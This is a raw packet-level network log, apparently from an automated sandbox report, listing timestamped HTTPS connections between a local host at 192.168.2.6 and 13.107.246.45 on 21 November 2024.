                                                                                                                                                                              Nov 21, 2024 08:31:09.008809090 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.008816004 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.035455942 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.035545111 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.035741091 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.035809994 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.035809994 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.035851955 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.035876989 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.038957119 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.038990974 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.039123058 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.039263010 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.039278984 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.335499048 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.338601112 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.338649035 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.339025021 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.339042902 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.339054108 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.339061022 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.342782021 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.342865944 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.342936993 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.343091011 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.343137980 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.425719976 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.428756952 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.428822041 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.428839922 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.428911924 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.428967953 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.429121971 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.429131031 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.429141045 CET49896443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.429145098 CET4434989613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.431962013 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.431996107 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.432058096 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.432348967 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.432359934 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.441591978 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.444628000 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.444699049 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.445245981 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.445251942 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.445262909 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.445266962 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.453712940 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.458612919 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.458693027 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.458970070 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.458970070 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.459002018 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.459027052 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.459372044 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.459405899 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.459475994 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.460077047 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.460109949 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.461735010 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.461771965 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:09.461831093 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.461946964 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:09.461960077 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:10.755074978 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:10.757618904 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:10.757632971 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:10.758095980 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:10.758100986 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.189049006 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.190097094 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.190531015 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.190625906 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.190993071 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.191009998 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.192204952 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.192281961 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.192356110 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.192374945 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.192419052 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.192424059 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.194761038 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.194798946 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.194998980 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.194998980 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.195029974 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.212333918 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.212743998 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.212793112 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.213192940 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.213200092 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.242182016 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.242615938 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.242654085 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.243051052 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.243062973 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.307642937 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.308186054 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.308218002 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.308798075 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.308809996 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.642663956 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.646370888 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.646445036 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.646526098 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.646526098 CET49904443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.646563053 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.646588087 CET4434990413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.649615049 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.649653912 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.649750948 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.649935007 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.649952888 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.656613111 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.659751892 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.659797907 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.659816027 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.659864902 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.659936905 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.659962893 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.659979105 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.659986973 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.663098097 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.663129091 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.663248062 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.663340092 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.663347960 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.685833931 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.688980103 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.689040899 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.689093113 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.689093113 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.689111948 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.689133883 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.692256927 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.692297935 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.692354918 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.692737103 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.692750931 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.762228966 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.765435934 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.765492916 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.765552998 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.765562057 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.768146992 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.768184900 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:11.768270016 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.768438101 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:11.768452883 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.018493891 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.019062996 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.019078016 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.019515038 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.019520044 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.214530945 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.217643023 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.217664003 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.218094110 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.218101025 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.408529997 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.409645081 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.409666061 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.410128117 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.410132885 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.461716890 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.464874029 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.467231035 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.467258930 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.467258930 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.467276096 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.467284918 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.469820023 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.469897032 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.469986916 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.470125914 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.470159054 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.530814886 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.531678915 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.531702995 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.532135963 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.532141924 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.566982031 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.567573071 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.567584991 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.568020105 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.568025112 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.652656078 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.655637980 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.655766010 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.655853033 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.655889988 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.655913115 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.655973911 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.655982018 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.658698082 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.658736944 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.658826113 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.658992052 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.659006119 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.843959093 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.847007036 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.847104073 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.847129107 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.847198963 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.847251892 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.847292900 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.847348928 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.847364902 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.849891901 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.849936962 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.850008011 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.850131989 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.850152016 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.964817047 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.967906952 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.969165087 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.974335909 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.974359989 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.974375963 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.974381924 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.977119923 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.977161884 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:13.977226973 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.977381945 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:13.977396011 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:14.018490076 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:14.021689892 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:14.021766901 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:14.021820068 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:14.021835089 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:14.021862030 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:14.021867037 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:14.024245977 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:14.024282932 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:14.024350882 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:14.024483919 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:14.024503946 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.250257969 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.250808954 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.250878096 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.251355886 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.251370907 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.377959013 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.378447056 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.378463984 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.378900051 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.378904104 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.573870897 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.574347973 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.574377060 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.574809074 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.574816942 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.695622921 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.698781013 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.698852062 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.698877096 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.698930979 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.699047089 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.699088097 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.699119091 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.699135065 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.701797009 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.701885939 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.701968908 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.702131033 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.702162027 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.768901110 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.769443989 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.769493103 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.769890070 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.769903898 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.809201002 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.810411930 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.810430050 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.810848951 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.810854912 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.814721107 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.817809105 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.817873955 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.817908049 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.817926884 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.817936897 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.817943096 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.820579052 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.820666075 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:15.820746899 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.820911884 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:15.820947886 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.010426044 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.013387918 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.013458014 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.013475895 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.013509035 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.013550997 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.015175104 CET49916443192.168.2.613.107.246.45
